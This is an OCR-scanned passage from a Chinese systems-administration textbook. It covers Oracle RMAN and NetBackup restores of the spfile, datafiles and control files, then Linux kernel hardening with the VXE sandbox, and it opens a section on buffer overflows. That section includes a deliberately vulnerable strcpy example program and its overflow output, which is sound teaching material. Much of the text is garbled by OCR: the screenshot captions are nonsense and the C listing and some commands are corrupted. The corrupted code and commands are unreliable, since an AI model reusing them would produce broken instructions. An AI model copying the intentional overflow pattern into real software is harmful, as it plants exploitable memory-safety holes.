上 面 列 出 的 10 月 5 号 的 备份 文件 名 就 是 刚才 备份 的 。/27lpkqdb 1 1 是 10 月 4 号 spfile 
的 单独 备份 。 如 果 没 有 单独 备份 spfile， 在 上 述 备份 过 程 中 ， 已 经 自动 备份 了 spfile， 文 件 名 是 
/bk u29lpm63q_ s73 pl 1731584634。 


12.4.2 ”恢复 过 程 


1. 假设 spfile 文件 丢失 ， 然 后 进行 恢复 spfile 操作 


首先 关闭 数据 库 ， 执 行 asmcmd， 将 spfiledb01.ora 文件 删除 ， 删 除 之 前 要 确认 dbid 的 值 
(使 用 RMAN 连接 ， 会 出 现 DBID 或 者 查询 v$database 视图 ) ， 这 个 值 在 恢复 spfile 的 时 候 
是 要 用 到 的 。 


运行 RMAN 程序 ， 设 置 dbid， 启 动 数据 库 至 nomount 状态 ， 执 行 以 下 脚本 : 


完成 后 ， 关 闭 数据 库 ， 重 启 数据 库 至 open 状态 : 


2. 模拟 单个 数据 文件 丢失 进行 恢复 


目前 存在 以 下 数据 文件 ， 将 数据 库 关 闭 ， 删 除 test.dbf 后 重启 数据 库 至 mount 状态 ， 将 表 
空间 重 置 为 offline 状态 然后 进行 恢复 : 
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这 里 恢复 可 以 有 两 种 ， 一 是 在 RMAN 中 敲 命令 ， 另 一 种 是 图 形 界面 ， 这 里 用 图 形 界面 操 


作 ， 如 图 12.27 所 示 。 


Eile Edit View Actions Help 


NetBackup server Sourre dien Destnation dlient: Folicy ype: 
madbxzxLeduan oradbxzxeducmn oradbxndedu mn Standard 
Backup Files | Restore Files | Task Progress 
Restore ype: 
Nowmal Backups -| 


Keyword phrase 
<none> 加 


Start date: End date 
Sep 30, 2010 3:26:14 PM Oa 5, 2010 11.59:59 PM 
Contents of selectad directory 


| Name “batkup Cate SizeBwes) | Mouined [SchedueTypel Pol | 


兢 | 


Deny Sriaine | 


图 12.27 NetBackup 主 界面 
单 击 右 上 角 的 到 按钮 ， 指 定 策略 类 型 为 Oracle， 如 图 12.28 所 示 。 


Eile Edit View Actions Help 

Netpackup sever: Sourre dient Destination qien Penq ype 回 
oradbxzyjeduan oradb pgedum oradbxrj.edu.cn Oracle 

Dackup Fies | Restore Files | Task Progress 
Restore type 

Normal Rackups 了 


Keyword phrase 
<none> 


Start date: End date: 司 男 
Sep 30, 2010 32614 PM Oc 5, 2010 115959 PM 


男 3 回电 


rowse directonys 1 


do01l 

~ DA Tablespaces 
~ DB archhed logs 
人 DO Datafie: 

~ EUsers 


Molapo/oracle/product/10.2.0/db-1 


图 12.28 指定 策略 类 型 为 Oracle 
然后 选中 要 恢复 的 表 空 间 进行 恢复 ， 如 图 12.29 所 示 。 


Eile Edt View Actions Help 
NetBackup server Source cllene 
ordb.xzxhedu.cn oradbxzxieducn 


Polioy pe 

en oo” 加 
Backup Files | Restore Files | Task Progress 

Restore type; 

Normal Backups 了 
Keyword phnse 
<none> 


Start date: End date: 国 回 
Sep 30 2010 32614 PM Oct5, 2010 11.5959 PN 【一 


回 辣 


Fawsedieaorm 


Directory suuaure 
9 Oradle 


| 
| 


Name 


Taolespac 
针 固 目 opol OB + DATA/dbol/dalafile/sysaux257.73102 262144000STSAUX 
[ee 口 +oaravdbolydarame/system 256.73102 461373440 SYSTEM 
sms | 


DB +OArAydpolyadarareJuncotbs1255.731. 25214400 UNDOTSS 
口 司 +DATA/dbolyaalafleusers 253.731023 5242880 USERS 


12.29 选中 需要 恢复 的 表 空 间 
单 击 restore 按钮 开始 恢复 ， 如 图 12.30 所 示 。 
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Target Database Logon Credentials 
Specify the target database logon credentials- 
os Authentication 
® Orade Authentication 
Oracle Logon Credentials 
User Mame: 
sys _ | 
Password: 


Net sevice name (TNS Alias: 


DOD Use Oracle RMAN recovery catalog 
图 12.30 Oracle 验证 


注意 : 要 以 Oracle 验证 进行 操作 。 根 据 提示 依次 进行 操作 (如 图 12.31 所 示 ) ， 最 后 
示 恢 复 成 功 画 面 ， 如 图 12.32 所 示 。 


Eile Edit View Artions He 


lel*® 国 [Ola x @ A 信人 与 和 车 因 区 
oradhxzx.edt.m Master Seven | 
crat xznj edu en Master Server) 
i Arrnve and Restore 
Aiy Monitor 
351Rertere Done 0 
T jament 
Rpm ne 类 。 15ptaap Done earaagk Deaui-A 
Folcles 淡 149Barkup Done Ooraoak Defauh-A| 
全国 Sorage W480ackup Done oorabsk Defauk-A| J 
站 人 147 Backup Done Ooraoak Defaul-A| | 
lot Propartes 5 mage Clea 。 Done 0 | 
1 Oa eee Mamonen | [W315 Caney nee Don | 
六 男 Medis 次 。 144 Calalog Bac Done 0nbu-catal ，Diferenta | 
六 属 oeyces 淡 。 143 catapgBac Done Onbucalal Diferentd 
一 倪 credentials x Catalog Dac... Done nbu-catal — 
Access Management W141lRestore Done 0 
> Vauk Nanaement 渗 。 140penore Done 0 
SW bare Moral Restore Nanagomon! |W 133Resore Done "| 
WR 。 138Rerore Done 0 
类 。 3137 mage clea，pone 0 
Ws5Bakwp Done orab 本 Default-A| 
六 。 135Renore Done 0 
灾 。 134Penere Done 0 
W338akup Done Doraok Defauk-A| 
1328akuwp Done 0orao Defaul-A| 
12.31 Activity Monitor 
Eile Edit View Actions Help 
NetBackup serve Source dienE Destination clien Fali Ope: 


radbvzxjeduen 
ckup Files Restore Files 


Treoma 
国 3ackup Oa 4 2010 4:28:08 PM Successful Delete 


Backup Oct 4, 2010 7:43:21 PM Successful 
国 sackup Oa 5, 2010 9:53:29 AM Successrul 


oradh xededuon onde 
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图 12.32 ”恢复 成 功 界面 
恢复 成 功 完成 ， 将 表 空 间 online， 数 据 库 切换 至 open 状态 : 


SQL> alter database datafile 5 online; 


480 


以 上 操作 在 RMAN 中 执行 以 下 命令 即 可 完成 : 


3. 控制 文件 丢失 的 恢复 
首先 模拟 控制 文件 丢失 ， 在 系统 中 删除 两 个 控制 文件 : 


接 下 来 ， 启 动 sqlplus 连接 Oracle 数据 库 : 
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[oracle@oradb ~]$ sqlplus "/as sysdba" 

SQL*Plus: Release 10.2.0.5.0 = Production on Tue Oct 5 13:28:19 2010 
Copyright (c) 1982, 2010, Oracle. All Rights Reserved. 

Connected to an idle instance. 

SQL> startup 

ORACLE instance started. 

Total System Global Area 599785472 bytes 


Fixed Size 2098112 bytes 
Variable Size 167775296 bytes 
Database Buffers 423624704 bytes 
Redo Buffers 6287360 bytes 


ORA-00205: error in identifying control file, check alert log for more info 


SQL> 
数据 库 实例 起 不 来 ， 报 告 控制 文件 错误 ， 接 着 使 用 RMAN 进行 恢复 : 


[oracleQ@oradb ~]$ RMAN target / 

Recovery Manager: Release 10.2.0.5.0 - Production on Tue Oct 5 13:29:32 2010 
Copyright (c) 1982, 2007, Oracle. All rights reserved. 

connected to target database: db01 (not mounted) 


RMAN> 
使 用 RMAN 连接 后 ， 数 据 库 的 状态 是 nomount 状态 ， 执 行 以 下 语句 恢复 控制 文件 : 


RMAN> run 1{ 

2> allocate channel ch00 type 'sbt tape'; 

3> send 'NB_ ORA SERV=oradb'; 

4> restore controlfile from '/bk u291pm63q _s73 pl t731584634'; 
5> release channel ch00; 

6> } 

allocated channel: ch00 

channel ch00: sid=159 devtype=SBT_TAPE 

channel ch00: Veritas NetBackup for Oracle - Release 6.5 (2010070800) 
sent command to channel: ch00 

Starting restore at 05-OCT-10 

channel ch00: restoring control file 

channel ch00: restore complete, elapsed time:00:00:43 

output filename=+DATA/db01/controlfile/current.260.731597699 
output filename=+DATA/db01/controlfile/current.261.731597703 


查看 是 否 恢复 成 功 : 


然后 以 resetlogs 方式 打开 数据 库 : 


这 里 报错 ， 因 为 刚 恢复 的 控制 文件 比较 老 ， 运 行 recover database 后 ， 再 以 resetlogs 方式 
打开 数据 库 : 
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+DATA/db01/onlinelog/group 3.267.731024085 

archive 1og thread 1 sequence 22 is already on disk as file 
+DATA/db01/onlinelog/group 1.262.731024013 

archive log thread 1 sequence 23 is already on disk as file 
+DATA/db01/onlinelog/group 2.264.731024043 

archive log filename=+DATA/db01/onlinelog/group 3.267.731024085 thread=1 
sequence=21 

archive log filename=+DATA/db01/onlinelog/group 1.262.731024013 thread=1 
sequence=22 

archive log filename=+DATA/db01/onlinelog/group 2.264.731024043 thread=1 
sequence=23 

media recovery complete, elapsed time: 00:00:03 

Finished recover at 05-OCT-10 

released channel: ch00 

RMAN> sql 'alter database open resetlogs'; 


sql statement: alter database open resetlogs 


RMAN> 


完全 恢复 过 程 是 指数 据 文 件 、 控 制 文件 、 日 志文 件 以 及 spfile 文件 丢失 ， 只 有 备份 存在 的 
恢复 。 这 个 恢复 顺序 是 : 


@ 先 恢复 spfile 文件 ， 然 后 将 数据 库 重 启 至 nomount 状态 下 。 

@ 在 nomount 状态 下 恢复 控制 文件 ， 完 成 后 将 数据 库 切 换 至 mount 状态 。 

@ 在 mount 状态 下 ， 执 行 restore database 和 recover database 命令 ， 恢 复数 据 库 ， 完 成 后 
以 resetlogs 方式 打开 数据 库 。 


第 13 章 内 核 安 全 加 固 案例 


13.1 用 VXE 保护 Linux 系统 安全 


所 有 的 操作 系统 都 有 漏洞 , 没有 一 个 系统 是 安全 的 , 任何 接 入 互联 网 的 系统 都 会 受到 探测 
并 可 能 遭 到 入 侵 。Linux 操作 系统 尽管 被 公认 为 是 比较 安全 、 运行 稳定 的 操作 系统 , 但 是 Linux 
自身 同样 存在 不 少 隐蔽 的 弱点 。 如 今 互联 网 变 得 如 此 流行 ， 每 个 人 都 在 使 用 Linux， 这 是 因为 
Linux 功能 强大 而 且 价格 便宜 。 也 正 是 因为 Linux 非常 便宜 ， 许 多 人 安装 Linux 后 会 忽视 了 它 
的 安全 问题 ， 由 于 粗心 大 意 或 是 能 力 有 限 而 没 能 很 好 地 保护 它们 。 

根据 网 络 安全 专家 分 析 ，Linux 存在 的 主要 弱点 包括 示例 脚本 、 无 关 软 件 、 开 放 端口 、 未 
打 补 丁 和 弱 口 令 等 问题 。 然 而, 最 令 人 担心 的 则 是 Linux 下 超级 用 户 的 权限 过 大 问题 。 有 人 形 
象 地 比喻 , Linux 下 的 超级 用 户 就 是 上 帝 , 它 可 以 让 你 生 , 也 可 以 让 你 死 。 黑客 们 常用 的 Linux 
入 侵 技术 就 是 提高 权限 。 如 果 黑 客 能 通过 一 些 手段 在 Linux 中 将 一 个 普通 用 户 权限 提升 为 root 
用 户 特 权 ， 毫 无 疑问 他 就 能 控制 整个 Linux 系统 。 

这 里 将 介绍 虚拟 执行 环境 技术 (Virtual eXecuting Environment， 简 称 VXE) 。 简 单 来 说 ， 
VXE 是 一 个 入 侵 保 护 系统 (IPS) 。 入 侵 保 护 系统 被 看 作 是 入 侵 检测 系统 的 一 个 重要 发 展 方向 ， 
它 解决 了 入 侵 检测 系统 不 会 主动 在 攻击 发 生前 阻 断 攻 击 的 重要 问题 。 入 侵 保 护 不 仅 可 以 进行 检 
测 ， 还 能 在 攻击 造成 损坏 前 阻 断 它们 ， 从 而 将 入 侵 检测 系统 提升 到 一 个 新 水 平 。 


13.1.1 ”VXE 的 工作 原理 


VXE 提供 对 Linux/UNIX 系统 的 保护 ， 阻 止 黑客 通过 网 络 入 侵 。 它 主要 通过 保护 主机 及 
Linux 下 的 子 系统 和 服务 来 保证 系统 安全 。 例 如 ，Linux 下 一 般 都 会 提供 SSH、SMTP、POP 
和 HTTP 等 服务 ， 这 些 服务 虽然 经 过 很 长 时 间 的 发 展 ， 但 是 仍然 会 存在 隐蔽 的 bug。VXE 在 
Linux 系统 中 的 任务 很 简单 ， 就 是 保护 主机 和 应 用 程序 的 安全 ， 对 用 户 调用 Shell 的 行为 做 出 
必要 的 限制 ， 对 提供 CGI (公共 网 关 接 口 ) 的 服务 器 进行 脚本 保护 。 因 此 可 以 看 到 ，VXE 的 
最 大 特点 是 无 须 改变 这 些 子 系统 及 程序 的 设置 ， 而 仅仅 只 是 去 保护 它们 。 

在 Linux 操作 系统 中 ， 当 以 root 用 户 来 运行 一 个 程序 的 时 候 ， 如 果 必 要 的 话 ， 这 个 程序 可 
以 调用 和 访问 到 系统 中 所 有 的 资源 。 尽 管 这 样 看 起 来 很 方便 ， 对 程序 的 运行 也 相当 有 好 处 ， 但 
是 这 种 情形 也 给 系统 安全 埋 下 了 隐患 。 一旦 黑客 能 通过 缓冲 区 溢出 攻击 来 控制 该 程序 , 破坏 的 
范围 就 非常 广泛 ， 这 无 疑 是 我 们 不 想 看 到 的 后 果 。 

通常 情况 下 ， 在 Linux/UNIX 系统 上 管理 员 有 许多 的 事情 要 做 ， 因 而 没有 时 间 和 精力 正确 
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地 配置 软件 。 这 时 为 了 保证 系统 能 在 尽 可 能 短 的 时 间 内 运行 ， 管 理 员 不 得 不 在 root 权限 下 安 
装 并 配置 程序 或 进程 。 这 是 保证 这 些 进程 能 对 所 需要 资源 进行 访问 的 一 个 快捷 、 简 便 的 方法 ， 
也 是 使 系统 变 得 脆弱 并 成 为 攻击 者 目标 的 一 个 简单 方法 。 特别 是 对 于 缓冲 区 溢出 攻击 , 正确 地 
配置 所 有 软件 ,使 其 在 尽 可 能 少 的 权限 下 是 非常 关键 的 。 这样 ， 即 使 攻击 者 可 以 攻击 系统 , 击 
溃 某 一 个 程序 ， 但 是 由 于 攻击 者 权限 受到 限制 ， 而 不 会 造成 更 大 的 危险 。 

众所周知 , 有 时 不 可 能 在 短期 内 发 现 程序 的 缺陷 , 需要 不 断 地 改进 才能 达到 软件 的 完整 性 。 
在 此 期 间 ， 该 程序 将 会 留 下 许多 潜在 的 问题 。VXE 技术 针对 程序 可 能 遭 到 的 缓冲 区 溢出 攻击 
提供 必要 的 保护 。 操 作 系统 中 传统 运行 模式 如 图 13.1 所 示 。 


Network connections 


HTTP POP 


OS.interactive programs:ls,cd,vi,..... 


图 13.1 操作 系统 中 传统 运行 模式 


当 一 个 程序 在 Linux 下 运行 时 ，VXE 会 为 该 程序 提供 一 个 单独 的 虚拟 执行 环境 来 保证 程 
序 的 运行 安全 。VXE 只 提供 给 程序 合适 的 系统 资源 进行 限制 ， 而 不 是 让 程序 最 大 地 调用 任意 
的 系统 资源 。 通 过 最 少 的 权限 运行 软件 ， 可 以 确保 运行 在 系统 上 的 所 有 软件 配置 正确 。 

当 整 个 组 织 机 构 实 施 安 全 策略 时 ， 作 为 系统 管理 员 ， 必 须 牢记 POLP (了 Principle of Least 
Privilege， 最 少 权限 原则 ) 。POLP 规定 运行 在 系统 上 的 所 有 程序 或 使 用 系统 的 任何 人 ， 都 应 
该 赋予 他 们 所 需要 的 最 少 权限 ， 其 他 权限 一 律 禁 止 。 例 如 ， 我 们 所 提供 的 POP 服务 其 最 大 功 
能 是 接收 电子 邮件 ， 而 与 之 无 关 的 复制 功能 、 文 本 编辑 功能 都 必须 禁止 。VXE 正 是 给 Linux 
系统 管理 员 提 供 了 这 样 的 方便 , 尽量 把 与 POP 服务 无 关 的 功能 禁止 , 为 popd 进程 提供 较为 安 
全 的 保护 。 


13.1.2 与 chroot 服务 的 比较 


谈 到 VXE，Linux 系统 管理 员 很 容易 会 联想 到 在 Linux 操作 系统 中 的 chroot 服务 监控 。 
chroot 服务 监控 同样 是 把 运行 在 Linux 主机 上 的 各 种 服务 ， 比 如 DNS、MYSQL、Web 等 放置 
在 特定 chroot 环境 中 运行 ， 从 而 把 这 些 服务 和 整个 系统 隔离 开 来 ， 这 样 ， 即 使 黑客 利用 服务 
漏洞 攻破 了 应 用 ， 也 很 难 突破 该 chroot 环境 来 危害 Linux 全 局 。 如 图 13.2 所 示 ，SMTP 服务 
缺陷 可 能 危及 系统 中 所 有 服务 程序 。 
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Network connections 


图 13.2 SMTP 服务 缺陷 可 能 危及 系统 中 所 有 服务 程序 


和 chroot 相 比 ，VXE 功能 更 为 强大 ， 配 置 和 使 用 方便 许多 。VXE 不 仅 能 严格 地 限制 文件 
系统 的 访问 权限 ， 还 能 对 子 系统 的 调用 、 进 程 之 间 的 通信 进行 约束 。 例 如 ， 在 POP 服务 中 ， 
即使 使 用 了 chroot 进行 服务 监禁 ，POP Server 还 是 能 读 取 /etc/passwd 和 /etc/shadow 的 信息 ， 
也 能 进行 复制 、 共 享 Lib 库 等 操作 ， 这 样 仍然 不 够 安全 。 使 用 VXE 对 POP 服务 进行 约束 则 能 
很 好 地 解决 这 个 问题 。 

防范 缓冲 区 溢出 攻击 的 办 法 就 是 先发制人 ,不 应 该 等 到 攻击 者 发 现 缓冲 区 溢出 漏洞 并 开始 
攻击 用 户 计算 机 的 时 候 才 想 起 要 对 系统 中 正在 运行 的 程序 进行 保护 ,这 也 是 Linux 下 使 用 VXE 
来 保证 系统 安全 的 根本 原因 。 

图 13.1~ 图 13.4 这 4 张 图 可 以 用 来 解释 VXE 技术 的 原理 。 图 13.1 是 操作 系统 中 传统 运行 模 
式 的 示意 图 ; 图 13.2 则 说 明 在 传统 运行 模式 下 ， 通 过 SMTP 服务 的 缺陷 ， 可 能 危及 系统 中 所 有 
的 服务 程序 ， 图 13.3 显示 利用 VXE 技术 将 系统 中 每 个 服务 单独 保护 起 来 运行 ， 可 以 提高 系统 
的 整体 安全 性 ， 图 13.4 说 明 采 用 了 VXE 技术 即使 SMTP 服务 存在 缺陷 ， 甚 至 被 攻击 者 控制 ， 
由 此 产生 的 最 大 威胁 也 仅仅 是 SMTP 服务 本 身 ， 不 会 危及 其 他 服务 和 整个 操作 系统 的 安全 。 
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图 13.3 利用 VXE 技术 提高 系统 整体 安全 性 


Network connections 


图 13.4 ”SMTP 服务 缺陷 在 VXE 技术 下 不 会 危及 整个 系统 安全 
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图 13.4 中 各 个 元 素 表示 的 含义 如 下 : 


@ 一 一 - VXE 技术。 

[| 系统 通常 状态 。 

em | 存在 缺陷 ， 可 能 会 对 其 他 服务 产生 威胁 的 状态 。 
后 受 成 胁 区 域 。 


从 以 上 示意 图 中 不 难 发 现 ，VXE 技术 的 根本 目的 就 是 ， 尽 量 缩小 存在 缺陷 的 程序 或 服务 
对 整个 系统 带 来 的 威胁 ， 将 风险 控制 在 一 定 范围 内 ， 从 而 实现 操作 系统 入 侵 保护 。 


13.1.3 ”VXE 安装 使 用 


VXE 最 新 版 本 支持 2.2.x 以 上 的 Linux 内 核 版 本 。 在 安装 VXE 之 前 , Linux 操作 系统 必须 
首先 安装 如 下 程序 : 


@ Linux Kernel 开发 包 ; 

@ Perl 语言 环境 ，Perl 的 默认 目录 路 径 为 /usrbin/perl， 如 果 Perl 没有 安装 在 默认 目录 路 
径 ， 必 须 做 相关 链接 ; 

@ TClx，TClx 默认 目录 路 径 为 /usr/bin/tcl， 如 果 TclX 没有 安装 在 默认 目录 路 径 ， 必 须 做 
相关 链接 ; 

@ 正常 运行 的 HTTP 服务 。 


手动 建立 一 个 临时 目录 ,将 VXE 压缩 包 解 压缩 到 该 临时 目录 中 。 在 正式 安装 VXE 之 前 ， 
还 需要 了 解 以 下 系统 信息 : 


@ Linux Kermel Source， 通 常 在 /usr/src/linux 目录 下 ; 

CGI 目录 路 径 ， 推 荐 将 VXE 在 CGI 目录 中 运行 ， 例 如 /home/httpd/cgi-bin/Vxe; 
VXE 二 进 制 代码 及 VXE 安装 路 径 ， 推 荐 安装 在 /usrlocal/vxe; 

Kernel Log 日 志文 件 路 径 ， 推 荐 安装 在 /var / log/kernel; 

VXE CGI 脚本 地 址 ， 推 荐 安装 在 /cgi-bin/vxe。 


以 上 目录 需要 用 户 手 动 创 建 ，VXE 安装 脚本 本 身 不 会 自动 创建 以 上 目录 。 如 果 Linux 系 
统 中 没有 Kernel Log 文件 ， 则 必须 修改 syslogd 配置 文件 。 在 /etc/syslog.conf 文件 中 加 入 如 下 
一 行 参数 : 


kern.* /var/log/kernel 


然后 ， 重 新 初始 化 syslogd。 做 好 上 述 准 备 工 作 后 ， 正 式 安装 VXE 很 简单 ， 只 需要 运行 
“./vxepatch.pl” 命 令 即 可 完成 编译 安装 。 
在 Linux 内 核 中 需要 配置 VXE。 在 内 核 二 进 制 源 目录 中 运行 make menuconfig 命令 ,使 
VXE 在 General Settings 子 菜单 中 有 效 ， 并 且 重 新 编译 内 核 。 注 意 ，make clean 这 一 步 十 分 重 
要 ， 当 选择 VXE 开启 或 关闭 时 ， 请 不 要 跳 过 此 步骤 。 
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重新 启动 新 编译 的 内 核 ， 然 后 检查 VXE 是 否 在 内 核 中 起 作用 。 进 入 /usrlocal/vxe 目录 ， 
运行 如 下 命令 : 


# ./vxe tracesum.vxt /bin/date date 


该 命令 表示 打印 内 核 当 前 日 期 操作 , 检查 /var/log/kermel。 如果 出 现 如 下 信息 , 则 表示 VXE 
在 内 核 中 己 经 开始 起 作用 : 


May 1 17:33:18 intes kernel:VXE 0xc33cc000 TraceSum:"syssum" 108 6 


最 后 ， 通过 浏览 器 检查 VXE 的 运行 情况 。 在 浏览 器 中 输入 
http://yourhost-address/cgi-bin/vxe/cvxe.tcl， 如 果 一 切 正 常 ， 将 会 出 现 VXE 的 页 面 。 

VXE 在 系统 中 的 运行 方式 包括 直接 运行 和 自动 运行 两 种 方式 。 直 接 运行 方式 即 传统 的 带 
参数 程序 运行 方式 。 直 接 运行 VXE 方法 简单 ， 和 大 多 数 Linux 程序 一 样 ，“vxed+ 路 径 + 执 行 
参数 ” 即 可 对 所 选 子 系统 进行 约束 。 自 动 运行 方式 稍微 复杂 一 些 。Linux 系统 管理 员 需 要 运行 
VXE 应 用 工具 将 VXE 加 入 到 Linux 内 核 中 ， 让 vxed 进程 能 自动 运行 。 不 过 通过 浏览 器 界面 ， 
系统 管理 员 能 方便 地 对 VXE 进行 自动 运行 设置 。 

关于 VXE 的 详细 管理 、 使 用 和 操作 方法 ，VXE 压缩 包 和 VXE 官方 主页 中 提供 了 图 文 并 
茂 的 用 户 手 册 。 限 于 篇 幅 ， 这 里 不 再 详细 介绍 。 实 际 上 通过 浏览 器 能 顺利 进入 
http://your-host-address/cgi-bin/vxe/cvxe.tcl 页 面 ， 则 以 下 的 操作 就 相当 简单 了 。 用 户 可 以 根据 
不 同 的 需求 直接 通过 浏览 器 对 VXE 进行 操作 , 并 可 以 阅读 VXE 日 志 , 更 好 地 保护 自己 的 Linux 
系统 。 


13.1.4 小 结 


本 节 也 希望 让 Linux 系统 管理 员 接 受 这 样 两 个 概念 , 一 是 Linux 系统 及 其 子 系统 的 安全 需 
要 坚持 POLP， 二 是 要 实现 主动 地 入 侵 保护 ， 而 不 是 要 等 到 攻击 事件 发 生 后 再 设法 挽救 ， 可 以 
通过 精确 地 设置 VXE 来 加 强 Linux 系统 安全 保护 ， 这 是 Linux 操作 系统 不 可 缺少 的 必要 入 侵 
保护 手段 。 


13.2 用 DSM 模块 来 阻止 缓冲 区 溢出 


互联 网 服务 器 (例如 Web、E-mail 和 FTP 等 服务 器 ) 一直 是 各 种 攻击 的 对 象 ， 而 这 些 攻 
击 的 主要 目标 就 是 使 其 不 能 够 为 它们 各 自 的 用 户 提供 服务 .尽管 这 种 攻击 技术 要 求 攻击 者 具备 
相当 深厚 的 汇编 语言 知识 , 甚至 还 要 求 掌握 操作 系统 接口 等 相关 细节 知识 , 一 旦 有 人 编写 了 这 
样 的 攻击 程序 ， 并 在 网 上 发 行 ， 这 些 攻击 的 结果 将 在 Unix 和 Linux 系统 平台 上 提供 交互 的 命 
令 外 壳 ， 甚 至 有 可 能 上 载 并 执行 Windows 系统 上 的 任意 程序 。 

为 了 满足 Linux 服务 器 高 级 安全 特性 的 需要 , 爱立信 公司 在 加 拿 大 蒙特 利 尔 的 开放 系统 实 
验 室 建立 了 分 布 式 安全 基础 结构 工程 (DSI)〉， 来 设计 和 开发 一 种 安全 基础 结构 一 一 专门 为 运 
行 于 Linux 服务 器 上 的 电信 应 用 软件 提供 高 级 安全 机 制 。 DSI 的 目标 之 一 是 防止 来 自 互联 网 和 
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企业 内 网 的 攻击 入 侵 ， 包 括 缓冲 区 溢出 攻击 、 拒 绝 服务 攻击 及 其 他 类 型 的 攻击 。 

本 节 将 介绍 缓冲 区 溢出 攻击 原理 , 提供 相应 示例 , 概述 阻止 缓冲 区 溢出 攻击 现 有 的 解决 方 
案 ， 并 且 详 细 分 析 作 为 DSI 工程 一 部 分 的 DSM 解决 方案 , 用 相当 简单 的 例子 来 帮助 读者 更 好 
地 理解 这 种 攻击 的 特点 及 怎样 阻止 它们 。 


13.2.1 初步 认识 缓冲 区 溢出 


缓冲 区 溢出 漏洞 从 计算 机 出 现 初期 就 已 经 存在 ， 并 且 今 天 仍然 存在 。 大 多 数 Internet 蠕虫 
程序 使 用 缓冲 区 溢出 漏洞 来 传播 ， 甚 至 是 Internet Explorer 中 的 O-day 漏洞 。2004 年 的 Sasser 
是 一 个 利用 微软 操作 系统 的 Lsass 缓冲 区 溢出 漏洞 ， 它 就 是 由 于 缓冲 区 溢出 造成 的 。 

缓冲 区 溢出 通常 是 向 数组 中 写 数据 时 ， 写 入 的 数据 的 长 度 超出 了 数组 原始 定义 的 大 小 。C 
语言 的 教程 里 时 通常 会 告诉 你 程序 溢出 后 会 发 生 不 可 预料 的 结果 , 但 在 网 络 安全 领域 , 缓冲 区 
洲 出 是 可 控 的 。 

C 语言 是 一 种 高 级 程序 设计 语言 ， 但 C 假定 程序 员 负 责 数据 的 完整 性 。 如 果 将 这 种 责任 
移交 给 编译 器 ,由 于 对 每 个 变量 都 要 检查 其 完整 性 ， 最 后 所 得 到 的 二 进 制 速度 将 会 非常 慢 。 并 
且 ， 这 会 使 程序 员 失 去 一 个 重要 的 控制 层 ， 并 会 使 语言 复杂 化 。 

尽管 C 语言 的 简单 性 增加 了 程序 员 的 控制 能 力 ， 提 高 了 最 后 所 得 到 的 程序 的 效率 ， 但 是 ， 
如 果 程 序 员 不 小 心 的 话 , 这 种 简单 性 会 导致 程序 缓冲 区 溢出 和 存储 器 泄漏 这 样 的 漏洞 。 这 意味 
着 一 旦 给 某 个 变量 分 配 了 存储 空间 , 则 没有 内 置 的 安全 机 制 来 确保 这 个 变量 的 容量 能 适应 已 分 
配 的 存储 空间 。 如 果 程 序 员 把 10 个 字 节 的 数据 存 入 只 分 配 了 8 个 字 节 空间 的 缓冲 区 中 ， 这 种 
操作 是 允许 的 ， 即 使 这 种 操作 很 可 能 导致 程序 崩溃 。 这 称 为 缓冲 区 超 限 〔buffer overrun) 或 组 
冲 区 溢出 ,由 于 多 出 的 两 个 字 节 数据 会 溢出 ,存储 在 已 分 配 的 存储 空间 之 外 ， 因 此 会 重 写 已 分 
配 存储 空间 之 后 的 数据 。 如 果 重 写 的 是 一 段 关 键 数 据 ， 程 序 就 会 衣 溃 。 代 码 文件 
overflowe_example.c 提供 了 一 个 例子 ， 如 图 13.5 所 示 。 
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喇 功 -四 虽 . 肥 区 
New Open ”Save prnt.. Fnd Replace 
罩 veriow_examplec 品 
tdio.hy| 1 
2#include <string.h> 
和 
4int nain(int argc，char +argv[]) { 
5 int vatue = 5; 
6 char buffer_one[al ，buffer_two[s]; 
7 
B strcpy(buffer_one, “one"); /+ put "one" into buffer_ one */ 
9 strcpy(buffer_two, “two"); /+ put "two” into buffer-two +/ 
19 
11 printf(" [BEFORE] buffer_two is et %p ond contains \‘'%s\'\n", buffer_two, buffer_two); 
12 printf(" [BEFORE] buffer-one is at %p and contains ee buffer-one, buffer-one); 
13 printf(" [BEFORE] value is at sp and is sq [9x%08x)\n", &value, value, value); 
14 
15 Brintr evn onveny hd bytes, inedibur er Meio, stientaroulth)ss 
15 Strcpy(buffer_two，argv[i]); /* copy first arguient into buffer_two *, 
17 
18 printf(* IAFTER] buffer_two 1s at sp and contalns \‘%s\‘\n”, buffer_twa, buffer_two); 
19 printf(" [AFTER] buffer-ane is at sp and contains \‘%e\'\n", buffer-one, butfer-one); 
29 printf(" [AFTER] value is at %p ond is %d (0x%08x)\n", é&velue, value, value); 
21} 


图 13.5 ”代码 文件 overflowe_example.c 提供 了 的 例子 
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13.2.2 用 GCC 编译 


编译 , 即 把 人 类 可 读 的 源 代码 转换 为 机 器 可 读 的 二 进 制 文件 的 过 程 , 编译 得 到 的 二 进 制 文 

件 可 在 计算 机 上 执行 。 更 具体 地 说 ， 编 译 器 接受 源 代码 ， 并 将 其 转换 为 一 组 中 间 文 件 称 为 目标 

代码 。 这些 文件 接近 可 执行 文件 , 但 可 能 引用 了 一 些 初始 源码 文件 中 未 包含 的 符号 和 函数 ， 这 

些 引 用 在 目标 代码 文件 中 是 无 法 解析 的 。 这 些 符 号 和 引用 通过 称 为 链接 的 过 程 进行 解析 , 在 此 

过 程 中 各 个 目标 文件 相互 链接 起 来 , 形成 可 执行 的 二 进 制 文件 。 在 这 里 , 笔者 简化 了 编译 过 程 ， 

以 便 读者 理解 , 当 使 用 C 语 言 在 Unix 系统 上 编程 时 , 所 选 的 编译 器 是 GNU C Compiler (GCC )。 
GCC 提供 了 许多 选项 供 编 译 时 使 用 。 最 常用 的 选项 : 


@ -o，filename 编译 得 到 的 二 进 制 文件 以 指定 的 文件 名 保存 ， 默 认 是 a.out。 
@ -c, 只 编译 不 链接 ,生成 的 目标 文件 扩展 名 为 .0, 下 面 我 们 开始 编译 overflow_example.c， 
如 图 13.6 所 示 。 


gcc -0 overflow overflow example.c 
ls -1 


1 reader reader 7528 2616-12-27 20:20 
1 reader reader 967 2010-12-27 20:05 overflow example.c 
] ./overflow 1234567890 
[BEFORE] buffer two is at Oxbffff810 and contains 'two' 
[BEFORE] buffer one is at 9xbffff818 and contains "one' 


[BEFORE] value is at 9xbffff824 and is 5 (0x00000005) 
[STRCPY] copying 10 bytes into buffer two 


[AFTER] buffer two is at gxbffff819 and contains 'EEEES3Bo0' 
[AFTER] buffer one is at 9xbffff818 an tains '99， 

[AFTER] value is at gxbffff824 and is 5 (9x69666665) 
readeraha 


ES [cdrom - File Browser] 


@ [Problem loading page 


图 13.6 编译 overflow_example.c 


